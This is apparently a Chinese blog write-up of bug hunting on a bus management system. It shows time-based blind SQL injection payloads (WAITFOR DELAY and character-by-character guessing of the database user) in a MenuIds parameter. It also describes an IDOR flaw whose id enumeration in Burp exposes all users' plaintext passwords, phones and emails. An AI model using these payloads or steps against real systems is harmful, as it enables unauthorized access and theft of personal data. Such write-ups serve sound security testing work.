某公交管理系统简易逻辑漏洞+SQL注入挖掘

某公交管理系统挖掘

SQL注入漏洞

前台通过给的账号密码,进去

按顺序依次点击1、2、3走一遍功能点，然后开启抓包点击4

当点击上图的4步骤按钮时，会抓到图下数据包，将其转发到burp的重放模块

构造以下注入poc，可见注入延时了五秒，用户输入的语句成功拼接到原有的SQL语句上执行了 下面的poc是MenuIds的值

100,101,151,152,153,154,200,201,202,203,204,300,301,302,303,305,306,307,308,311,312,313,314,400,401,800,801,802,805,806,850,851,852,853,861,862,863,870,880,900,9070,9071,9080,9081,9082,9083,9084,9085,9086,9093’;WAITFOR DELAY ’0:0:5’ --

下面开始进行注入拿数据，构造下面poc，对数据库当前用户名进行查询

100,101,151,152,153,154,200,201,202,203,204,300,301,302,303,305,306,307,308,311,312,313,314,400,401,800,801,802,805,806,850,851,852,853,861,862,863,870,880,900,9070,9071,9080,9081,9082,9083,9084,9085,9086,9093’;if(ascii(substring((select user),1,1)))=116 WAITFOR DELAY ’0:0:5’ --

成功延时5秒，说明数据库当前用户名第一个字母为t，下面继续对数据库用户名第N位字母进行猜解

后面通过注入我成功拿到当前数据库用户名

越权漏洞

在点击上图中的编辑按钮时，开启抓包，抓到下图示数据包。

将数据包发送到burp的重放模块，然后将id值改为1

可以看见明文看见其他用户的账户密码、手机号、邮箱等敏感信息，我们可以利用这个信息进行登录等操作 再次将数据包转发到burp的Intruder模块，进行1-100遍历id值，可见也是将全站用户信息都可以遍历出来了，此处就只展示测试数据了。